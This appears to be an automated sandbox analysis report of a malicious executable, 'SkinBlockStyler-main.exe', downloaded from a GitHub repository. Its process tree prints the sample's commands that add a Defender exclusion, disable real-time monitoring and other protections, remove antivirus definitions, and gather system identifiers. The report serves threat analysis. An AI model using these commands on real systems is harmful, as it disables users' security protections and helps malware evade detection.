Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
71s -
max time network
81s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
14/02/2024, 01:48
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/applehhgf/SkinBlockStyler-main.
Resource
win10v2004-20231215-en
General
-
Target
https://github.com/applehhgf/SkinBlockStyler-main.
Malware Config
Signatures
-
Loads dropped DLL 9 IoCs
pid Process 732 SkinBlockStyler-main.exe 732 SkinBlockStyler-main.exe 732 SkinBlockStyler-main.exe 732 SkinBlockStyler-main.exe 732 SkinBlockStyler-main.exe 732 SkinBlockStyler-main.exe 732 SkinBlockStyler-main.exe 732 SkinBlockStyler-main.exe 732 SkinBlockStyler-main.exe -
resource yara_rule behavioral1/files/0x00040000000162ac-283.dat upx behavioral1/memory/732-286-0x00007FF973DF0000-0x00007FF97425E000-memory.dmp upx behavioral1/files/0x0003000000000715-289.dat upx behavioral1/memory/732-292-0x00007FF9882F0000-0x00007FF988314000-memory.dmp upx behavioral1/files/0x000300000000074d-291.dat upx behavioral1/files/0x0003000000000745-310.dat upx behavioral1/files/0x0003000000000743-309.dat upx behavioral1/memory/732-308-0x00007FF9882E0000-0x00007FF9882EF000-memory.dmp upx behavioral1/files/0x000300000000073f-307.dat upx behavioral1/files/0x000300000000073d-306.dat upx behavioral1/files/0x0003000000000737-305.dat upx behavioral1/files/0x0003000000000735-304.dat upx behavioral1/files/0x0003000000000717-303.dat upx behavioral1/files/0x0003000000000713-302.dat upx behavioral1/files/0x00040000000162b6-301.dat upx behavioral1/files/0x00040000000162b4-300.dat upx behavioral1/files/0x00040000000162b2-299.dat upx behavioral1/files/0x00040000000162a9-296.dat upx behavioral1/files/0x000300000000074b-295.dat upx behavioral1/memory/732-316-0x00007FF988160000-0x00007FF98818D000-memory.dmp upx behavioral1/memory/732-319-0x00007FF987340000-0x00007FF987359000-memory.dmp upx behavioral1/memory/732-320-0x00007FF987320000-0x00007FF98733F000-memory.dmp upx behavioral1/memory/732-322-0x00007FF973C70000-0x00007FF973DE1000-memory.dmp upx behavioral1/memory/732-325-0x00007FF973C50000-0x00007FF973C69000-memory.dmp upx behavioral1/memory/732-327-0x00007FF987930000-0x00007FF98793D000-memory.dmp upx behavioral1/memory/732-329-0x00007FF973C20000-0x00007FF973C4E000-memory.dmp upx behavioral1/memory/732-330-0x00007FF973B60000-0x00007FF973C18000-memory.dmp upx behavioral1/files/0x000300000000074b-332.dat upx behavioral1/memory/732-340-0x00007FF9737E0000-0x00007FF973B55000-memory.dmp upx behavioral1/memory/732-355-0x00007FF9737C0000-0x00007FF9737D4000-memory.dmp upx behavioral1/memory/732-358-0x00007FF973DF0000-0x00007FF97425E000-memory.dmp upx behavioral1/memory/732-356-0x00007FF9878F0000-0x00007FF9878FD000-memory.dmp upx behavioral1/memory/732-359-0x00007FF9736A0000-0x00007FF9737B8000-memory.dmp upx behavioral1/memory/732-360-0x00007FF9882F0000-0x00007FF988314000-memory.dmp upx behavioral1/memory/1768-391-0x000001C5BD950000-0x000001C5BD960000-memory.dmp upx behavioral1/memory/732-402-0x00007FF987320000-0x00007FF98733F000-memory.dmp upx behavioral1/files/0x000200000001e702-409.dat upx behavioral1/memory/732-412-0x00007FF973C70000-0x00007FF973DE1000-memory.dmp upx behavioral1/memory/732-414-0x00007FF973C50000-0x00007FF973C69000-memory.dmp upx behavioral1/memory/5020-415-0x00007FF96C3C0000-0x00007FF96C82E000-memory.dmp upx behavioral1/files/0x000200000001e702-410.dat upx behavioral1/memory/732-426-0x00007FF973B60000-0x00007FF973C18000-memory.dmp upx behavioral1/memory/732-428-0x00007FF973DF0000-0x00007FF97425E000-memory.dmp upx behavioral1/memory/5020-427-0x00007FF9711A0000-0x00007FF9711C4000-memory.dmp upx behavioral1/memory/732-430-0x00007FF9882F0000-0x00007FF988314000-memory.dmp upx behavioral1/memory/732-432-0x00007FF9882E0000-0x00007FF9882EF000-memory.dmp upx behavioral1/memory/732-433-0x00007FF973C20000-0x00007FF973C4E000-memory.dmp upx behavioral1/memory/732-434-0x00007FF988160000-0x00007FF98818D000-memory.dmp upx behavioral1/memory/732-436-0x00007FF987340000-0x00007FF987359000-memory.dmp upx behavioral1/memory/732-438-0x00007FF987320000-0x00007FF98733F000-memory.dmp upx behavioral1/memory/5020-429-0x00007FF986B10000-0x00007FF986B1F000-memory.dmp upx behavioral1/memory/732-440-0x00007FF973C50000-0x00007FF973C69000-memory.dmp upx behavioral1/memory/732-441-0x00007FF987930000-0x00007FF98793D000-memory.dmp upx behavioral1/memory/732-442-0x00007FF973C20000-0x00007FF973C4E000-memory.dmp upx behavioral1/memory/732-443-0x00007FF973B60000-0x00007FF973C18000-memory.dmp upx behavioral1/memory/732-439-0x00007FF973C70000-0x00007FF973DE1000-memory.dmp upx behavioral1/memory/5020-451-0x00007FF9703A0000-0x00007FF9703CD000-memory.dmp upx behavioral1/memory/732-452-0x00007FF9737E0000-0x00007FF973B55000-memory.dmp upx behavioral1/memory/732-457-0x00007FF9737C0000-0x00007FF9737D4000-memory.dmp upx behavioral1/memory/732-458-0x00007FF9878F0000-0x00007FF9878FD000-memory.dmp upx behavioral1/memory/5020-456-0x00007FF96C8B0000-0x00007FF96C8CF000-memory.dmp upx behavioral1/memory/732-460-0x00007FF9736A0000-0x00007FF9737B8000-memory.dmp upx behavioral1/memory/5020-459-0x00007FF96B460000-0x00007FF96B5D1000-memory.dmp upx behavioral1/memory/5020-461-0x00007FF9872F0000-0x00007FF9872FD000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
flow ioc 30 raw.githubusercontent.com 31 camo.githubusercontent.com 34 camo.githubusercontent.com 36 camo.githubusercontent.com 37 camo.githubusercontent.com 39 camo.githubusercontent.com 33 raw.githubusercontent.com 35 camo.githubusercontent.com 38 camo.githubusercontent.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2520 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\Local Settings msedge.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3548 msedge.exe 3548 msedge.exe 404 msedge.exe 404 msedge.exe 224 identity_helper.exe 224 identity_helper.exe 3660 msedge.exe 3660 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe 404 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 404 wrote to memory of 4060 404 msedge.exe 83 PID 404 wrote to memory of 4060 404 msedge.exe 83 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3112 404 msedge.exe 85 PID 404 wrote to memory of 3548 404 msedge.exe 84 PID 404 wrote to memory of 3548 404 msedge.exe 84 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86 PID 404 wrote to memory of 5056 404 msedge.exe 86
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/applehhgf/SkinBlockStyler-main.1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9871946f8,0x7ff987194708,0x7ff9871947182⤵PID:4060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,5946120778019514988,11619184742232248887,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,5946120778019514988,11619184742232248887,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:22⤵PID:3112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,5946120778019514988,11619184742232248887,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:82⤵PID:5056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,5946120778019514988,11619184742232248887,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:12⤵PID:1888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,5946120778019514988,11619184742232248887,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:12⤵PID:2524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,5946120778019514988,11619184742232248887,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5500 /prefetch:82⤵PID:4292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,5946120778019514988,11619184742232248887,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5500 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,5946120778019514988,11619184742232248887,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:12⤵PID:3176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,5946120778019514988,11619184742232248887,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:12⤵PID:1580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,5946120778019514988,11619184742232248887,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:12⤵PID:1568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,5946120778019514988,11619184742232248887,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3396 /prefetch:82⤵PID:3460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,5946120778019514988,11619184742232248887,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:12⤵PID:3228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,5946120778019514988,11619184742232248887,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:12⤵PID:1772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,5946120778019514988,11619184742232248887,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3400 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3660
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1580
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3416
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4700
-
C:\Users\Admin\Downloads\SkinBlockStyler-main.-main\SkinBlockStyler-main.-main\SkinBlockStyler-main.exe"C:\Users\Admin\Downloads\SkinBlockStyler-main.-main\SkinBlockStyler-main.-main\SkinBlockStyler-main.exe"1⤵PID:3956
-
C:\Users\Admin\Downloads\SkinBlockStyler-main.-main\SkinBlockStyler-main.-main\SkinBlockStyler-main.exe"C:\Users\Admin\Downloads\SkinBlockStyler-main.-main\SkinBlockStyler-main.-main\SkinBlockStyler-main.exe"2⤵
- Loads dropped DLL
PID:732 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\SkinBlockStyler-main.-main\SkinBlockStyler-main.-main\SkinBlockStyler-main.exe'"3⤵PID:4440
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\SkinBlockStyler-main.-main\SkinBlockStyler-main.-main\SkinBlockStyler-main.exe'4⤵PID:1768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4732
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:3504
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵PID:3640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:1204
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:724
-
-
-
-
C:\Users\Admin\Downloads\SkinBlockStyler-main.-main\SkinBlockStyler-main.-main\SkinBlockStyler-main.exe"C:\Users\Admin\Downloads\SkinBlockStyler-main.-main\SkinBlockStyler-main.-main\SkinBlockStyler-main.exe"1⤵PID:4872
-
C:\Users\Admin\Downloads\SkinBlockStyler-main.-main\SkinBlockStyler-main.-main\SkinBlockStyler-main.exe"C:\Users\Admin\Downloads\SkinBlockStyler-main.-main\SkinBlockStyler-main.-main\SkinBlockStyler-main.exe"2⤵PID:5020
-
-
C:\Users\Admin\Downloads\SkinBlockStyler-main.-main\SkinBlockStyler-main.-main\SkinBlockStyler-main.exe"C:\Users\Admin\Downloads\SkinBlockStyler-main.-main\SkinBlockStyler-main.-main\SkinBlockStyler-main.exe"1⤵PID:4956
-
C:\Users\Admin\Downloads\SkinBlockStyler-main.-main\SkinBlockStyler-main.-main\SkinBlockStyler-main.exe"C:\Users\Admin\Downloads\SkinBlockStyler-main.-main\SkinBlockStyler-main.-main\SkinBlockStyler-main.exe"2⤵PID:1908
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5efc9c7501d0a6db520763baad1e05ce8
SHA160b5e190124b54ff7234bb2e36071d9c8db8545f
SHA2567af7b56e2f0a84ae008785726f3404eb9001baa4b5531d0d618c6bdcb05a3a7a
SHA512bda611ddba56513a30295ea5ca8bc59e552154f860d13fed97201cdb81814dd6d1bca7deca6f8f58c9ae585d91e450f4383a365f80560f4b8e59a4c8b53c327d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\6660f6d4-b1ff-41e7-bdf1-dc84a2448c26.tmp
Filesize6KB
MD5f281ad00c0e5038670d7d4673329b0ae
SHA16423514e0145d33df7ddbec8ba8ce799f053d93b
SHA256aca2eb413f362ea2365a03a0bff43f33e371b8bc81a8ecb82b35ce7a39e2e49b
SHA51217b048f0bca7b31017232d72ea02e06e655bf8730d54435bcc8bf9b001d3511cbecf6b9d15afbde661a6e1580c824aabf9f2236336ccb7782151f87ab102720d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize1KB
MD5474807a9519c25c597f7abcd383d5c3f
SHA1635bc954916c1be9757044db24a2ea8879d5ff21
SHA2564e1cbc628957855c02cac2d6be87a9c96990dda84edbe4375ced8ff7eaaef4e0
SHA51257396b41742b97f494c94a6331e0f6094203f0fd5ea716dcd3a4c9c97ae79bc6c6c80b098197d4826f298be6113a16ff83adb57d230a2f46041b21e2845ba735
-
Filesize
740B
MD55eecd82f22dffd39d2e3f67d4399100b
SHA1f8f2af039c849a0395026efa9256564b00b0529a
SHA2564b369759116ee158c966f1eb86ac358d41da45323fee35e035f6f42139b82134
SHA512c156ac06e25d2b72a683d8e5eed4ae864962f62d84a9e64ceb46ab15f5372afcbd4911b03a8bf43b376397b7a7b5330a3e9cf6f3bb1717d3869f700d06ce5a3b
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
5KB
MD5723a1f44c0fc28d9633e0be2aa894040
SHA10aa835ef778908b206605ac89616dd3578d3a94b
SHA25644bab041f28590e8ec22f531c6208baaec27c3b09d3396fd9e80045c2b420025
SHA512f4d4184a6b46feadad13418951c7ce344cab641f590189a5b25351fd0fb3ad66ca15d921552f92016dbd73ae8a3e06f07a4f185822eb593915c8589ae7a7df1a
-
Filesize
5KB
MD50a738767736d4c694ca3dbf5473fae53
SHA195d6d57d75fb627bdce0c8b25095308c6a4cdedf
SHA256d1b4dfe218cf864724f2a07ec51c6f36343d4dea76b2de4e9fbca864d3e5d2f4
SHA512a46ca2b8e7c786f76d56d7abca5aae8193901175a4383de98628aad2043436b80306ca3c2fa17626894a0279017164c885e083862cf1219326bf98b1b67ed220
-
Filesize
24KB
MD5121510c1483c9de9fdb590c20526ec0a
SHA196443a812fe4d3c522cfdbc9c95155e11939f4e2
SHA256cf5d26bc399d0200a32080741e12f77d784a3117e6d58e07106e913f257aa46c
SHA512b367741da9ab4e9a621ad663762bd9c459676e0fb1412e60f7068834cbd5c83b050608e33d5320e1b191be1d809fef48831e0f42b3ecabd38b24ec222576fa81
-
Filesize
1KB
MD5bd4300efde82c11b2362c9995a7cdb25
SHA1148d5b11c8dfca7a0656a25ece0c6e21550642ee
SHA2566aa0c2d164ba33f94c8653fc9d60ecc913c363a18676864ce7adf0ef24a4da5b
SHA512d9eabf2696f548bf8505191455e0627adb02ae9e92583dbfb926a4f30d2ccbfdd6b01b4c83415c55f63953bea274c25ba364394e0951cb5c46613b64700f5a95
-
Filesize
1KB
MD5e582b621ad4a1e0d56531bf74e60d967
SHA1199aaa5bb05c208407711f8cace68615bdfe9d9e
SHA25697064b55f0d399a9d663a7254ccf4a7fae1f28d8dba18232ac89b9f821ed6849
SHA5126dab670c87571154973823aab0ac28e544584225819fa63182f223bcb2685e2adf5eb50c86b7a2eb2df8fee7ea44a15d969ec3d8112a9657dd7cc777f6bd3cc5
-
Filesize
1KB
MD52e286bbad2ab6a105de18a0a4345407f
SHA1c7dab31cc6a633d7c38ec1749c10b8c57537c6a8
SHA25615a9d54c1298ce3a9fb344f1235ccf7a5e9887245560c1490c0c35275b1d8ca6
SHA512e5ae097e77c2c60a6decef00b37ee5adf31242653c3bd4c660d9f143a9206b7c1e3ad48e21a1d90539cd334cf5bd42eace38ed44f660ab53f0371df0f8baffb2
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD560da1eee04bd4799b182305cd050d6bf
SHA1f469c1b444f263e496d241205634cf540245dbe9
SHA25660ed5c0b6cd81a04202fe3fe7f0557eb2da4be7a79b0ce522df4bac76d98fced
SHA512d1fd93da69641225f8c3779ae02a38f0cbde627df010bc12097ae18391d4427055b94581046ace3029fad5572bdedbbfdd3fd24c2ef2f1681ad506fcc8fee455
-
Filesize
10KB
MD5198d2c0b39ef7009660384493172e43e
SHA17ea9c1b29225ef515a2b1059e7e4143885e1501e
SHA2560a7932d2562847c2f45348f67cd7ebe5607f30a4f874826166a42663700a8f27
SHA51231d08b229746f2b5e6d0be374a6ef1e30193ea25638d9955362115a1a7202c0febe1175d4b9ac8e76ad65acd9811f04b3ec480b37b67d7d9a73742cecb6495e9
-
Filesize
10KB
MD57299a3e6d10034c6745e94c9f414c5d0
SHA1abb5710c1fdcaa0e8dbf9160b4aeb2c984a536a4
SHA256f4cbbfa11edd6c02f61bfef2a7408c729ecd8841f972686203647cd67b23fc81
SHA512dfea98c42847a59fd1ee633b4a70fdeae40b968d29901b5dc6030127edee54574bf25860ed803e53d6d09dd22fd95b62db1872e14f2b138834ccc4eebc37dd10
-
Filesize
106KB
MD5870fea4e961e2fbd00110d3783e529be
SHA1a948e65c6f73d7da4ffde4e8533c098a00cc7311
